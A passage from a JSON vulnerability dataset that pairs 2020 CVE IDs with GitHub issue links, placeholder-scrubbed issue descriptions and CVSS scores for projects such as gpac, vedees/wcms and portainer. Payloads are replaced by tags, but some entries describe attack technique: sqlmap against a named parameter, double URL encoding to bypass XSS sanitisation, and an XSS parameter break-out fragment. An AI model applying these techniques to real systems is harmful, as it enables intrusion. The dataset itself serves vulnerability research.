  56676. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56677. "severity": "MEDIUM",
  56678. "baseScore": 5.5,
  56679. "impactScore": 3.6,
  56680. "exploitabilityScore": 1.8
  56681. },
  56682. {
  56683. "CVE_ID": "CVE-2020-23915",
  56684. "Issue_Url_old": "https://github.com/yhirose/cpp-peglib/issues/122",
  56685. "Issue_Url_new": "https://github.com/yhirose/cpp-peglib/issues/122",
  56686. "Repo_new": "yhirose/cpp-peglib",
  56687. "Issue_Created_At": "2020-08-07T11:41:48Z",
  56688. "description": "A heap overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), peglint (latest master NUMBERTAG f URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG ast opt ./heap overflow resolve_escape_sequence peglib NUMBERTAG PATHTAG APITAG output ERRORTAG POC FILETAG",
  56689. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56690. "severity": "MEDIUM",
  56691. "baseScore": 5.5,
  56692. "impactScore": 3.6,
  56693. "exploitabilityScore": 1.8
  56694. },
  56695. {
  56696. "CVE_ID": "CVE-2020-23921",
  56697. "Issue_Url_old": "https://github.com/Samuel-Tyler/fast_ber/issues/30",
  56698. "Issue_Url_new": "https://github.com/samuel-tyler/fast_ber/issues/30",
  56699. "Repo_new": "samuel-tyler/fast_ber",
  56700. "Issue_Created_At": "2020-08-07T12:52:04Z",
  56701. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc, fast_ber_compiler (latest master NUMBERTAG b5 URLTAG Configure cmake .. DCMAKE_CXX_FLAGS=\" fsanitize=address g\" DCMAKE_C_FLAGS=\" fsanitize=address g\" DCMAKE_EXE_LINKER_FLAGS=\" fsanitize=address\" Command line PATHTAG APITAG /tmp/fastber APITAG output ERRORTAG POC FILETAG",
  56702. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56703. "severity": "HIGH",
  56704. "baseScore": 7.1,
  56705. "impactScore": 5.2,
  56706. "exploitabilityScore": 1.8
  56707. },
  56708. {
  56709. "CVE_ID": "CVE-2020-23928",
  56710. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1568",
  56711. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1568",
  56712. "Repo_new": "gpac/gpac",
  56713. "Issue_Created_At": "2020-08-07T04:41:36Z",
  56714. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  56715. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56716. "severity": "HIGH",
  56717. "baseScore": 7.1,
  56718. "impactScore": 5.2,
  56719. "exploitabilityScore": 1.8
  56720. },
  56721. {
  56722. "CVE_ID": "CVE-2020-23928",
  56723. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1569",
  56724. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1569",
  56725. "Repo_new": "gpac/gpac",
  56726. "Issue_Created_At": "2020-08-07T14:53:11Z",
  56727. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  56728. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56729. "severity": "HIGH",
  56730. "baseScore": 7.1,
  56731. "impactScore": 5.2,
  56732. "exploitabilityScore": 1.8
  56733. },
  56734. {
  56735. "CVE_ID": "CVE-2020-23930",
  56736. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1565",
  56737. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1565",
  56738. "Repo_new": "gpac/gpac",
  56739. "Issue_Created_At": "2020-08-07T02:28:14Z",
  56740. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG dxml NUMBERTAG d diod latm keep utc out /dev/null APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  56741. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56742. "severity": "MEDIUM",
  56743. "baseScore": 5.5,
  56744. "impactScore": 3.6,
  56745. "exploitabilityScore": 1.8
  56746. },
  56747. {
  56748. "CVE_ID": "CVE-2020-23931",
  56749. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1567",
  56750. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1567",
  56751. "Repo_new": "gpac/gpac",
  56752. "Issue_Created_At": "2020-08-07T04:38:51Z",
  56753. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  56754. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56755. "severity": "HIGH",
  56756. "baseScore": 7.1,
  56757. "impactScore": 5.2,
  56758. "exploitabilityScore": 1.8
  56759. },
  56760. {
  56761. "CVE_ID": "CVE-2020-23931",
  56762. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1564",
  56763. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1564",
  56764. "Repo_new": "gpac/gpac",
  56765. "Issue_Created_At": "2020-08-07T01:48:18Z",
  56766. "description": "A heap buffer overflow in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address ldl\" ./configure static mp4box Command line PATHTAG diso out /dev/null APITAG APITAG output ERRORTAG POC FILETAG",
  56767. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56768. "severity": "HIGH",
  56769. "baseScore": 7.1,
  56770. "impactScore": 5.2,
  56771. "exploitabilityScore": 1.8
  56772. },
  56773. {
  56774. "CVE_ID": "CVE-2020-23932",
  56775. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1566",
  56776. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1566",
  56777. "Repo_new": "gpac/gpac",
  56778. "Issue_Created_At": "2020-08-07T03:10:20Z",
  56779. "description": "A Segmentation fault in APITAG System info Ubuntu NUMBERTAG gcc APITAG NUMBERTAG ubuntu1), APITAG (latest master NUMBERTAG aa NUMBERTAG URLTAG Configure CFLAGS=\" g fsanitize=address\" LDFLAGS=\" fsanitize=address\" ./configure static mp4box Command line PATHTAG sdp ttxt NUMBERTAG dump chap ogg dump cover drtp bt out /dev/null APITAG Output APITAG APITAG output ERRORTAG POC FILETAG",
  56780. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  56781. "severity": "MEDIUM",
  56782. "baseScore": 5.5,
  56783. "impactScore": 3.6,
  56784. "exploitabilityScore": 1.8
  56785. },
  56786. {
  56787. "CVE_ID": "CVE-2020-23945",
  56788. "Issue_Url_old": "https://github.com/VictorAlagwu/CMSsite/issues/14",
  56789. "Issue_Url_new": "https://github.com/victoralagwu/cmssite/issues/14",
  56790. "Repo_new": "victoralagwu/cmssite",
  56791. "Issue_Created_At": "2020-07-07T07:45:05Z",
  56792. "description": "SQL Injection in FILETAG form. Hello, I found that there is a sql injection vulnerability in the cat_id parameter of the FILETAG file on the website. Entering single quotes in this parameter will cause the webpage to burst and the database statement to burst. And this parameter can be used by sqlmap to obtain data information in the database. FILETAG FILETAG",
  56793. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  56794. "severity": "HIGH",
  56795. "baseScore": 7.5,
  56796. "impactScore": 3.6,
  56797. "exploitabilityScore": 3.9
  56798. },
  56799. {
  56800. "CVE_ID": "CVE-2020-23962",
  56801. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/7",
  56802. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/7",
  56803. "Repo_new": "xwlrbh/catfish",
  56804. "Issue_Created_At": "2020-07-08T04:03:53Z",
  56805. "description": "XSS in \"announcement\" plugin. Catfish CMS NUMBERTAG allows XSS via the \"announcement\" plugin, the parameter \"announcement_gonggao\" in url FILETAG set the parameter : announcement_gonggao: \"> APITAG open the index page, and the js is run.",
  56806. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56807. "severity": "MEDIUM",
  56808. "baseScore": 6.1,
  56809. "impactScore": 2.7,
  56810. "exploitabilityScore": 2.8
  56811. },
  56812. {
  56813. "CVE_ID": "CVE-2020-24000",
  56814. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/13",
  56815. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/13",
  56816. "Repo_new": "weng-xianhu/eyoucms",
  56817. "Issue_Created_At": "2020-07-09T16:50:20Z",
  56818. "description": "There is SQL injection in your source code. The vulnerability affects FILETAG , tid URL encoded POST input tid was set to NUMBERTAG Use APITAG FILETAG",
  56819. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56820. "severity": "CRITICAL",
  56821. "baseScore": 9.8,
  56822. "impactScore": 5.9,
  56823. "exploitabilityScore": 3.9
  56824. },
  56825. {
  56826. "CVE_ID": "CVE-2020-24025",
  56827. "Issue_Url_old": "https://github.com/sass/node-sass/issues/3067",
  56828. "Issue_Url_new": "https://github.com/sass/node-sass/issues/3067",
  56829. "Repo_new": "sass/node-sass",
  56830. "Issue_Created_At": "2021-02-05T08:32:48Z",
  56831. "description": "Security Vulnerability Issue CVETAG ]. [ URLTAG URLTAG Certificate validation in node sass NUMBERTAG to NUMBERTAG is disabled when requesting binaries even if the user is not specifying an alternative download path. URLTAG URLTAG Version NUMBERTAG was released in October, but through reading the source code of NUMBERTAG we found that this issue is still unresolved. Is there a plan to fix this issue?",
  56832. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  56833. "severity": "MEDIUM",
  56834. "baseScore": 5.3,
  56835. "impactScore": 1.4,
  56836. "exploitabilityScore": 3.9
  56837. },
  56838. {
  56839. "CVE_ID": "CVE-2020-24026",
  56840. "Issue_Url_old": "https://github.com/jianyan74/TinyShop/issues/14",
  56841. "Issue_Url_new": "https://github.com/jianyan74/tinyshop/issues/14",
  56842. "Repo_new": "jianyan74/tinyshop",
  56843. "Issue_Created_At": "2020-07-12T12:16:11Z",
  56844. "description": "XSS vulnerability in reply to product reviews. APITAG a free and open source mall based on APITAG has a stored XSS vulnerability that affects version NUMBERTAG APITAG allows XSS via the explain_first and again_explain parameters of the FILETAG page. Backend open source address: URLTAG Front end open source address: URLTAG rageframe2: URLTAG view images: POC APITAG APITAG",
  56845. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56846. "severity": "MEDIUM",
  56847. "baseScore": 6.1,
  56848. "impactScore": 2.7,
  56849. "exploitabilityScore": 2.8
  56850. },
  56851. {
  56852. "CVE_ID": "CVE-2020-24074",
  56853. "Issue_Url_old": "https://github.com/kn007/silk-v3-decoder/issues/62",
  56854. "Issue_Url_new": "https://github.com/kn007/silk-v3-decoder/issues/62",
  56855. "Repo_new": "kn007/silk-v3-decoder",
  56856. "Issue_Created_At": "2020-06-05T18:28:58Z",
  56857. "description": "The decoder has a stack overflow. The decoder has a stack overflow At NUMBERTAG lines of code in Decoder.c CODETAG SKP_int NUMBERTAG APITAG FILETAG Then the size of the copy is a very large number, resulting in a buffer overflow Test file: URLTAG CODETAG",
  56858. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  56859. "severity": "CRITICAL",
  56860. "baseScore": 9.8,
  56861. "impactScore": 5.9,
  56862. "exploitabilityScore": 3.9
  56863. },
  56864. {
  56865. "CVE_ID": "CVE-2020-24119",
  56866. "Issue_Url_old": "https://github.com/upx/upx/issues/388",
  56867. "Issue_Url_new": "https://github.com/upx/upx/issues/388",
  56868. "Repo_new": "upx/upx",
  56869. "Issue_Created_At": "2020-07-22T09:10:40Z",
  56870. "description": "Heap buffer overflow in APITAG What's the problem (or question)? A heap buffer overflow read in the latest commit APITAG URLTAG of the devel branch ASAN reports: ERRORTAG What should have happened? Check if the file is normal, exit if abnormal Do you have an idea for a solution? Add more checks How can we reproduce the issue? upx.out d APITAG poc: FILETAG Please tell us details about your environment. UPX version used ( APITAG ): CODETAG Host Operating System and version: Ubuntu NUMBERTAG LTS Host CPU architecture NUMBERTAG Target Operating System and version: same as Host Target CPU architecture: same as Host",
  56871. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  56872. "severity": "HIGH",
  56873. "baseScore": 7.1,
  56874. "impactScore": 5.2,
  56875. "exploitabilityScore": 1.8
  56876. },
  56877. {
  56878. "CVE_ID": "CVE-2020-24130",
  56879. "Issue_Url_old": "https://github.com/ponzu-cms/ponzu/issues/352",
  56880. "Issue_Url_new": "https://github.com/ponzu-cms/ponzu/issues/352",
  56881. "Repo_new": "ponzu-cms/ponzu",
  56882. "Issue_Created_At": "2020-07-27T07:21:58Z",
  56883. "description": "There are three CSRF vulnerabilities that can add an administrator account. After the administrator has logged in, open the following three pages NUMBERTAG FILETAG Add an administrator. ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG FILETAG Delete an administrator using username(email), and the param 'id' is not useful, you can delete any user you think username(email). ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG FILETAG It can edit the configuration, for example NUMBERTAG Change HTTP Basic Auth APITAG to download a backup of your data via HTTP NUMBERTAG Change administrator email and used with FILETAG NUMBERTAG Change Client Secret which is used to validate requests. ~~~html APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG ~~~",
  56884. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  56885. "severity": "HIGH",
  56886. "baseScore": 8.1,
  56887. "impactScore": 5.2,
  56888. "exploitabilityScore": 2.8
  56889. },
  56890. {
  56891. "CVE_ID": "CVE-2020-24135",
  56892. "Issue_Url_old": "https://github.com/vedees/wcms/issues/9",
  56893. "Issue_Url_new": "https://github.com/vedees/wcms/issues/9",
  56894. "Repo_new": "vedees/wcms",
  56895. "Issue_Created_At": "2020-07-20T15:12:03Z",
  56896. "description": "Reflected XSS vulnerability. Hi, dev team! There is Reflected XSS vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG Example POC: Just send any js code in type parameter like: APITAG Reflected cross site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. To prevent xss use next manual: URLTAG Please let me know about any fixes, I would like to register CVE number.",
  56897. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56898. "severity": "MEDIUM",
  56899. "baseScore": 6.1,
  56900. "impactScore": 2.7,
  56901. "exploitabilityScore": 2.8
  56902. },
  56903. {
  56904. "CVE_ID": "CVE-2020-24136",
  56905. "Issue_Url_old": "https://github.com/vedees/wcms/issues/12",
  56906. "Issue_Url_new": "https://github.com/vedees/wcms/issues/12",
  56907. "Repo_new": "vedees/wcms",
  56908. "Issue_Created_At": "2020-07-20T15:25:18Z",
  56909. "description": "Path Traversal vulnerability in PATHTAG Hi, dev team! There is Path Traversal vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: CODETAG A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files To prevent vulnerability use next manual: URLTAG (prevent section) Please let me know about any fixes, I would like to register CVE number.",
  56910. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  56911. "severity": "HIGH",
  56912. "baseScore": 8.6,
  56913. "impactScore": 4.0,
  56914. "exploitabilityScore": 3.9
  56915. },
  56916. {
  56917. "CVE_ID": "CVE-2020-24137",
  56918. "Issue_Url_old": "https://github.com/vedees/wcms/issues/7",
  56919. "Issue_Url_new": "https://github.com/vedees/wcms/issues/7",
  56920. "Repo_new": "vedees/wcms",
  56921. "Issue_Created_At": "2020-07-20T14:57:42Z",
  56922. "description": "Path Traversal vulnerability . Hi, dev team! There is Path Traversal vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Example POC: CODETAG A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with \u201cdot dot slash (../)\u201d sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files To prevent vulnerability use next manual: URLTAG (prevent section) Please let me know about any fixes, I would like to register CVE number.",
  56923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  56924. "severity": "MEDIUM",
  56925. "baseScore": 5.3,
  56926. "impactScore": 1.4,
  56927. "exploitabilityScore": 3.9
  56928. },
  56929. {
  56930. "CVE_ID": "CVE-2020-24138",
  56931. "Issue_Url_old": "https://github.com/vedees/wcms/issues/10",
  56932. "Issue_Url_new": "https://github.com/vedees/wcms/issues/10",
  56933. "Repo_new": "vedees/wcms",
  56934. "Issue_Created_At": "2020-07-20T15:19:07Z",
  56935. "description": "Reflected XSS vulnerability. Hi, dev team! There is Reflected XSS vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: Just send any js code in pagename parameter like: APITAG Reflected cross site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. To prevent xss use next manual: URLTAG Please let me know about any fixes, I would like to register CVE number.",
  56936. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  56937. "severity": "MEDIUM",
  56938. "baseScore": 6.1,
  56939. "impactScore": 2.7,
  56940. "exploitabilityScore": 2.8
  56941. },
  56942. {
  56943. "CVE_ID": "CVE-2020-24139",
  56944. "Issue_Url_old": "https://github.com/vedees/wcms/issues/8",
  56945. "Issue_Url_new": "https://github.com/vedees/wcms/issues/8",
  56946. "Repo_new": "vedees/wcms",
  56947. "Issue_Created_At": "2020-07-20T15:05:53Z",
  56948. "description": "SSRF Vulnerability . Hi, dev team! There is SSRF Vulnerability in APITAG file. The vulnerable code is NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG Example POC: CODETAG Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using APITAG scheme) To prevent vulnerability use next manual: FILETAG Please let me know about any fixes, I would like to register CVE number.",
  56949. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
  56950. "severity": "HIGH",
  56951. "baseScore": 8.3,
  56952. "impactScore": 3.7,
  56953. "exploitabilityScore": 3.9
  56954. },
  56955. {
  56956. "CVE_ID": "CVE-2020-24140",
  56957. "Issue_Url_old": "https://github.com/vedees/wcms/issues/11",
  56958. "Issue_Url_new": "https://github.com/vedees/wcms/issues/11",
  56959. "Repo_new": "vedees/wcms",
  56960. "Issue_Created_At": "2020-07-20T15:22:21Z",
  56961. "description": "SSRF Vulnerability in PATHTAG Hi, dev team! There is SSRF Vulnerability in APITAG file. The vulnerable code is: PATHTAG APITAG PATHTAG APITAG PATHTAG APITAG Example POC: APITAG Server Side Request Forgery (SSRF) vulnerabilities let an attacker send crafted requests from the back end server of a vulnerable web application. It can help identify open ports, local network hosts and execute command on services (for example redis, by using APITAG scheme) To prevent vulnerability use next manual: FILETAG Please let me know about any fixes, I would like to register CVE number.",
  56962. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
  56963. "severity": "HIGH",
  56964. "baseScore": 8.3,
  56965. "impactScore": 3.7,
  56966. "exploitabilityScore": 3.9
  56967. },
  56968. {
  56969. "CVE_ID": "CVE-2020-24164",
  56970. "Issue_Url_old": "https://github.com/ptaoussanis/nippy/issues/130",
  56971. "Issue_Url_new": "https://github.com/ptaoussanis/nippy/issues/130",
  56972. "Repo_new": "ptaoussanis/nippy",
  56973. "Issue_Created_At": "2020-07-24T15:47:42Z",
  56974. "description": "Remote Code Execution vulnerability via Java's Serializable interface. Details coming",
  56975. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  56976. "severity": "HIGH",
  56977. "baseScore": 7.8,
  56978. "impactScore": 5.9,
  56979. "exploitabilityScore": 1.8
  56980. },
  56981. {
  56982. "CVE_ID": "CVE-2020-24213",
  56983. "Issue_Url_old": "https://github.com/Fluorohydride/ygopro/issues/2314",
  56984. "Issue_Url_new": "https://github.com/fluorohydride/ygopro/issues/2314",
  56985. "Repo_new": "fluorohydride/ygopro",
  56986. "Issue_Created_At": "2020-07-31T14:38:56Z",
  56987. "description": "Security Issue: Memory leak. Memory leak This vulnerability happens when the functions APITAG and APITAG are used. When the player sends a packet with erroneous 'mainc' size and 'sidec' size, the function APITAG does not check whether those parameters are legal. Then this function will calculate the sum of those parameters. ERRORTAG The algorithm treats 'mainc' and 'sidec' as two unsigned numbers, so there is an integer overflow; when we set those parameters like NUMBERTAG their sum will be zero. It is ok though, but in the function APITAG it will cause a buffer overread. ERRORTAG We can see in this function, the parameters 'mainc' and 'sidec' were treated as two int type numbers. So if we set 'mainc' as NUMBERTAG fffffff' and 'sidec' as NUMBERTAG in this function it will read 'dbuf' from range NUMBERTAG to NUMBERTAG Function APITAG also does an important thing: If the memory's data can be found in APITAG function, then it will add it into 'deck'; Else if APITAG function can't find memory's data in database, it will record it in the errorcode and return. Then in the APITAG function, the errorcode will be written into 'deck_error[dp >type]'. Now we can see the function APITAG ERRORTAG This function will check 'deck_error[dp >type]', if it is not zero, it will pack the errcode into 'scem' structure and send it to players. Thanks to it, we can get an easy way to leak the program memory. And here is my test program, it works well in my local environment. URLTAG",
  56988. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  56989. "severity": "HIGH",
  56990. "baseScore": 7.5,
  56991. "impactScore": 3.6,
  56992. "exploitabilityScore": 3.9
  56993. },
  56994. {
  56995. "CVE_ID": "CVE-2020-24263",
  56996. "Issue_Url_old": "https://github.com/portainer/portainer/issues/4105",
  56997. "Issue_Url_new": "https://github.com/portainer/portainer/issues/4105",
  56998. "Repo_new": "portainer/portainer",
  56999. "Issue_Created_At": "2020-07-27T03:51:32Z",
  57000. "description": "Disable Container Capabilities for non admins. We currently provide the ability for a user to specify additional container capabilities when deploying a container, both using the container UX and also via a compose file. There are certain capabilities that could escalate privilege higher than a user should need for reasonable activities, and therefore may be deemed a security risk. We need to provide a new security option that allows the administrator to disable the ability for non admin users to manually set container capabilities. This change should be reflected in the front end (remove the option to set capabilities), and also the backend (to block the use via stacks or API).",
  57001. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  57002. "severity": "HIGH",
  57003. "baseScore": 8.8,
  57004. "impactScore": 5.9,
  57005. "exploitabilityScore": 2.8
  57006. },
  57007. {
  57008. "CVE_ID": "CVE-2020-24264",
  57009. "Issue_Url_old": "https://github.com/portainer/portainer/issues/4106",
  57010. "Issue_Url_new": "https://github.com/portainer/portainer/issues/4106",
  57011. "Repo_new": "portainer/portainer",
  57012. "Issue_Created_At": "2020-07-27T03:57:20Z",
  57013. "description": "enforce the security switch \"disable the use of bind mounts\" when set via API. Right now we allow the Portainer administrator to \"disable the use of bind mounts by non admins\", which is purely a front end restriction, and is more of a \"hide the capability\". This feature stops using from selecting to use bind mounts in the container / service creation views, and stops the use of bind mounts when writing stacks. However, if a skilled user was to craft an API request to Portainer that included bind mounts, it would succeed as there is no backend enforcement. To ensure security, we should enforce this restriction via the backend so that it cannot be used through the Portainer API.",
  57014. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  57015. "severity": "CRITICAL",
  57016. "baseScore": 9.8,
  57017. "impactScore": 5.9,
  57018. "exploitabilityScore": 3.9
  57019. },
  57020. {
  57021. "CVE_ID": "CVE-2020-24265",
  57022. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/616",
  57023. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/616",
  57024. "Repo_new": "appneta/tcpreplay",
  57025. "Issue_Created_At": "2020-07-30T07:46:09Z",
  57026. "description": "FILETAG Expected behavior Get an a.cach at the path or exit when meet abnormal input. System : Tcpreplay Version NUMBERTAG tcpprep V ERRORTAG OS: ubuntu NUMBERTAG Additional context none.",
  57027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57028. "severity": "HIGH",
  57029. "baseScore": 7.5,
  57030. "impactScore": 3.6,
  57031. "exploitabilityScore": 3.9
  57032. },
  57033. {
  57034. "CVE_ID": "CVE-2020-24266",
  57035. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/617",
  57036. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/617",
  57037. "Repo_new": "appneta/tcpreplay",
  57038. "Issue_Created_At": "2020-07-30T08:41:03Z",
  57039. "description": "FILETAG Expected behavior Get an a.cach at the path or exit when meet abnormal input. System (please complete the following information): Tcpreplay Version NUMBERTAG tcpprep V ERRORTAG OS: ubuntu NUMBERTAG Additional context None.",
  57040. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  57041. "severity": "HIGH",
  57042. "baseScore": 7.5,
  57043. "impactScore": 3.6,
  57044. "exploitabilityScore": 3.9
  57045. },
  57046. {
  57047. "CVE_ID": "CVE-2020-24301",
  57048. "Issue_Url_old": "https://github.com/jamesagnew/hapi-fhir/issues/2026",
  57049. "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/2026",
  57050. "Repo_new": "hapifhir/hapi-fhir",
  57051. "Issue_Created_At": "2020-08-08T20:05:26Z",
  57052. "description": "XSS Vulnerability in Testpage Overlay. Thanks to Will Davison of NCC Group APITAG UK) for disclosing this vulnerability. Text of disclosure follows: > Evidence \u2013 Reflected XSS: > > It was possible to send a GET request to the HAPI FHIR Web Application such that any included malicious code would be executed in the victim\u2019s browser. This could be used to craft a phishing link, for example. > > By URL encoding twice, it was possible to bypass any sanitisation on URL parameters which were reflected In the page body. > The following double URL encoded payload was used to display an alert box: > > APITAG > > URL encoding once transforms the string into: > APITAG > URL encoding once more gives us our final payload of: > APITAG > > Being used to craft a APITAG Link such as: > URLTAG > > In the above example, the vulnerable parameter is \u201cid\u201d but this should also work for vid and account. It\u2019s likely that this issue is present in a few places, but I have not exhaustively tested. I would recommend reviewing the code in order to ensure both input sanitisation and output encoding are consistent across the application. > OWASP\u2019s Cheat Sheet series may be of some use here: FILETAG This vulnerability affects only users of the APITAG Overlay\" HAPI FHIR module. Maven coordinates for this module are: APITAG ca. APITAG APITAG hapi fhir testpage overlay Affected versions are any versions NUMBERTAG and below. This issue is resolved in version NUMBERTAG Analysis: Users of the HAPI FHIR Testpage Overlay can use a specially crafted URL to exploit an XSS vulnerability in this module, allowing arbitrary APITAG to be executed in the user's browser. The impact of this vulnerability is believed to be low, as this module is intended for testing and not believed to be widely used for any production purposes. Nonetheless, we recommend all users of the affected module upgrade immediately. \nA complete audit of the affected codebase has been completed in order to detect and resolve any similar issues.",
  57053. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  57054. "severity": "MEDIUM",
  57055. "baseScore": 6.1,
  57056. "impactScore": 2.7,
  57057. "exploitabilityScore": 2.8
  57058. },
  57059. {
  57060. "CVE_ID": "CVE-2020-24327",
  57061. "Issue_Url_old": "https://github.com/purple-WL/Discourse-sending-email-function-exist-Server-side-request-forgery-SSRF-/issues/1",
  57062. "Issue_Url_new": "https://github.com/purple-wl/discourse-sending-email-function-exist-server-side-request-forgery-ssrf-/issues/1",
